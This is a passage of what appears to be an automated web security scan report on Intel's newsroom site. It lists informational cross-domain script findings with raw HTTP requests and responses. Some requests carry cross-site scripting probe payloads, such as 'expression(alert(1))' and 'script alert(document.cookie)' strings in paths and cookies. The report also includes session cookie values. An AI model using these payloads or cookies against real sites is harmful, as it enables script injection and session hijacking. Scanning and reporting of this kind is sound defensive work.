  • http://www.google.com/buzz/api/button.js

Request

GET /community/intel_newsroom/blog/2011/0176c51%22style=%22x:expression(alert(1))%22f5ad9d5bc7f/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business?cid=rss-258152-c1-264093 HTTP/1.1
Host: newsroom.intel.com
Proxy-Connection: keep-alive
Referer: http://burp/show/13
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; cf=0; countrylang=United%20States%20-%20English; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; __utmv=; __utma=1.167981993.1296947562.1296947562.1296947562.1; __utmc=1; JSESSIONID=5E01E36EFE93C49336779F5E81214FBA.node6IPR; jive.recentHistory.-1=31342c323031363b; __utmz=174403261.1296957276.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/9; __utma=174403261.410478132.1296947569.1296947569.1296957276.2; __utmc=174403261; __utmb=174403261.1.10.1296957276; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_cc=true; s_lv=1296957287861; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dgg_about%2Bintel_pressroom97bc3%25253cscript%25253ealert%281%29%25253; s_sq=intelcorpitcenter%2Cintelcorpcim%2Cintelcorpbus%2Cintelitcenterenus%3D%2526pid%253Dcim%25253Aitcenter%25253Aen_us%25253Alibrary%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/p/en_US/support%25253Fiid%25253Dhdr%25252Bsupport%2526ot%253DA; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel,http%3A//www.intel.com/about/corporateresponsibility/index.htm%3Fiid%3Dsubhdr+cr:Intel%20Corporate%20Responsibility%20-%20With%20Leadership%20Comes%20Responsibility,http%3A//itcenter.intel.com/ResourceLibrary%3F4b801%27%253E%253Cscript%253Ealert%28document.cookie%29%253C/script%253E7e58a74ceab%3D1:%0A%09%0AIT%20Center%20Resource%20Library%0A%0A,http%3A//www.intel.com/p/en_US/support%3Fiid%3Dhdr+support:Intel%AE%20Product%20Support,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dgg_about+intel_pressroom97bc3%25253Cscript%25253Ealert%281%29%25253C/script%25253E00808251755:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel

Response

HTTP/1.1 404 Not Found
Date: Sun, 06 Feb 2011 01:56:02 GMT
Server: Apache
X-JAL: 18
Content-Language: en-US
CacheHit: D=26872 t=1296957362198101
X-JSL: D=26877 t=1296957362198101
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<he
...[SNIP]...
</script>
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
<script type="text/javascript" src="http://www.google.com/buzz/api/button.js"></script>
<script type="text/javascript" src="http://widgets.digg.com/buttons.js"></script>
...[SNIP]...

18.67. http://newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newsroom.intel.com
Path:   /community/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://platform.twitter.com/widgets.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://widgets.digg.com/buttons.js
  • http://www.google.com/buzz/api/button.js

Request

GET /community/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard HTTP/1.1
Host: newsroom.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947627821; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; countrylang=United%20States%20-%20English; s_sq=intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA%26intelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; jive.recentHistory.-1=31342c323031363b; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dftr%2Bpress; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=174403261; cf=0; __utmb=174403261.3.10.1296947569;

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:14:09 GMT
Server: Apache
Set-Cookie: jive.recentHistory.-1=332c333031313b332c323137393b332c323137373b33382c313935393b33382c313934363b33382c313936303b31342c323031363b; Expires=Mon, 07-Mar-2011 23:14:11 GMT; Path=/
X-JAL: 66
Content-Language: en-US
CacheHit: D=161784 t=1296947649952957
X-JSL: D=161790 t=1296947649952957
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<he
...[SNIP]...
</script>
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
<script type="text/javascript" src="http://www.google.com/buzz/api/button.js"></script>
<script type="text/javascript" src="http://widgets.digg.com/buttons.js"></script>
...[SNIP]...

18.68. http://newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newsroom.intel.com
Path:   /community/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://platform.twitter.com/widgets.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://widgets.digg.com/buttons.js
  • http://www.google.com/buzz/api/button.js

Request

GET /community/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up HTTP/1.1
Host: newsroom.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947627821; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; countrylang=United%20States%20-%20English; s_sq=intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA%26intelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; jive.recentHistory.-1=31342c323031363b; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dftr%2Bpress; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=174403261; cf=0; __utmb=174403261.3.10.1296947569;

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:14:09 GMT
Server: Apache
Set-Cookie: jive.recentHistory.-1=332c333031313b332c323137393b332c323137373b33382c313936303b33382c313935393b33382c313934363b31342c323031363b; Expires=Mon, 07-Mar-2011 23:14:11 GMT; Path=/
X-JAL: 38
Content-Language: en-US
CacheHit: D=46892 t=1296947649661306
X-JSL: D=46898 t=1296947649661306
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<he
...[SNIP]...
</script>
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
<script type="text/javascript" src="http://www.google.com/buzz/api/button.js"></script>
<script type="text/javascript" src="http://widgets.digg.com/buttons.js"></script>
...[SNIP]...

18.69. http://newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newsroom.intel.com
Path:   /community/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://platform.twitter.com/widgets.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://widgets.digg.com/buttons.js
  • http://www.google.com/buzz/api/button.js

Request

GET /community/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours HTTP/1.1
Host: newsroom.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947627821; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; countrylang=United%20States%20-%20English; s_sq=intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA%26intelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; jive.recentHistory.-1=31342c323031363b; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dftr%2Bpress; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=174403261; cf=0; __utmb=174403261.3.10.1296947569;

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:14:09 GMT
Server: Apache
Set-Cookie: jive.recentHistory.-1=332c333031313b332c323137393b332c323137373b33382c313934363b33382c313936303b33382c313935393b31342c323031363b; Expires=Mon, 07-Mar-2011 23:14:11 GMT; Path=/
X-JAL: 40
Content-Language: en-US
CacheHit: D=133429 t=1296947649850972
X-JSL: D=133434 t=1296947649850972
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<he
...[SNIP]...
</script>
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
<script type="text/javascript" src="http://www.google.com/buzz/api/button.js"></script>
<script type="text/javascript" src="http://widgets.digg.com/buttons.js"></script>
...[SNIP]...

18.70. http://newsroom.intel.com/community/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newsroom.intel.com
Path:   /community/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://platform.twitter.com/widgets.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://widgets.digg.com/buttons.js
  • http://www.google.com/buzz/api/button.js

Request

GET /community/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio HTTP/1.1
Host: newsroom.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947627821; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; countrylang=United%20States%20-%20English; s_sq=intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA%26intelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; jive.recentHistory.-1=31342c323031363b; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dftr%2Bpress; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=174403261; cf=0; __utmb=174403261.3.10.1296947569;

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:14:11 GMT
Server: Apache
Set-Cookie: jive.recentHistory.-1=332c333031313b332c323137393b332c323137373b33382c313936333b33382c313936303b33382c313935393b33382c313934363b31342c323031363b; Expires=Mon, 07-Mar-2011 23:14:13 GMT; Path=/
X-JAL: 61
Content-Language: en-US
CacheHit: D=69382 t=1296947651605241
X-JSL: D=69388 t=1296947651605241
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<he
...[SNIP]...
</script>
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
<script type="text/javascript" src="http://www.google.com/buzz/api/button.js"></script>
<script type="text/javascript" src="http://widgets.digg.com/buttons.js"></script>
...[SNIP]...

18.71. http://newsroom.intel.com/community/intel_newsroom/blog/2011/images/jive-userbar-bg.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newsroom.intel.com
Path:   /community/intel_newsroom/blog/2011/images/jive-userbar-bg.png

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://platform.twitter.com/widgets.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://widgets.digg.com/buttons.js
  • http://www.google.com/buzz/api/button.js

Request

GET /community/intel_newsroom/blog/2011/images/jive-userbar-bg.png HTTP/1.1
Host: newsroom.intel.com
Proxy-Connection: keep-alive
Referer: http://newsroom.intel.com/community/intel_newsroom/blog/2011/0176c51%22style=%22x:expression(alert(1))%22f5ad9d5bc7f/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business?cid=rss-258152-c1-264093
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; cf=0; countrylang=United%20States%20-%20English; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; __utmv=; __utma=1.167981993.1296947562.1296947562.1296947562.1; __utmc=1; JSESSIONID=5E01E36EFE93C49336779F5E81214FBA.node6IPR; jive.recentHistory.-1=31342c323031363b; __utmz=174403261.1296957276.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/9; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel,http%3A//www.intel.com/about/corporateresponsibility/index.htm%3Fiid%3Dsubhdr+cr:Intel%20Corporate%20Responsibility%20-%20With%20Leadership%20Comes%20Responsibility,http%3A//itcenter.intel.com/ResourceLibrary%3F4b801%27%253E%253Cscript%253Ealert%28document.cookie%29%253C/script%253E7e58a74ceab%3D1:%0A%09%0AIT%20Center%20Resource%20Library%0A%0A,http%3A//www.intel.com/p/en_US/support%3Fiid%3Dhdr+support:Intel%AE%20Product%20Support,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dgg_about+intel_pressroom97bc3%25253Cscript%25253Ealert%281%29%25253C/script%25253E00808251755:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utma=174403261.410478132.1296947569.1296947569.1296957276.2; __utmc=174403261; __utmb=174403261.2.10.1296957276; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_cc=true; cmp_cookie=rss-258152-c1-264093; s_lv=1296957466999; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/blog/2011/0176c51%2522style%3D%2522x%3Aexpression%28alert%281%29%29%2522f5ad9d5b; s_sq=intelcorpitcenter%2Cintelcorpcim%2Cintelcorpbus%2Cintelitcenterenus%3D%2526pid%253Dcim%25253Aitcenter%25253Aen_us%25253Alibrary%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/p/en_US/support%25253Fiid%25253Dhdr%25252Bsupport%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Date: Sun, 06 Feb 2011 01:56:07 GMT
Server: Apache
X-JAL: 19
Content-Language: en-US
CacheHit: D=156646 t=1296957367993954
X-JSL: D=156652 t=1296957367993954
Cache-Control: no-cache
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<he
...[SNIP]...
</script>
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
<script type="text/javascript" src="http://www.google.com/buzz/api/button.js"></script>
<script type="text/javascript" src="http://widgets.digg.com/buttons.js"></script>
...[SNIP]...

18.72. http://newsroom.intel.com/community/intel_newsroom/emailPasswordToken!input.jspa  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newsroom.intel.com
Path:   /community/intel_newsroom/emailPasswordToken!input.jspa

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://platform.twitter.com/widgets.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://widgets.digg.com/buttons.js
  • http://www.google.com/buzz/api/button.js

Request

GET /community/intel_newsroom/emailPasswordToken!input.jspa HTTP/1.1
Host: newsroom.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947627821; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; countrylang=United%20States%20-%20English; s_sq=intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA%26intelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; jive.recentHistory.-1=31342c323031363b; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dftr%2Bpress; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=174403261; cf=0; __utmb=174403261.3.10.1296947569;

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:14:17 GMT
Server: Apache
X-JAL: 9
Content-Language: en-US
CacheHit: D=144336 t=1296947657278502
X-JSL: D=144342 t=1296947657278502
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<he
...[SNIP]...
</script>
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
<script type="text/javascript" src="http://www.google.com/buzz/api/button.js"></script>
<script type="text/javascript" src="http://widgets.digg.com/buttons.js"></script>
...[SNIP]...

18.73. http://newsroom.intel.com/community/intel_newsroom/free_press/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newsroom.intel.com
Path:   /community/intel_newsroom/free_press/

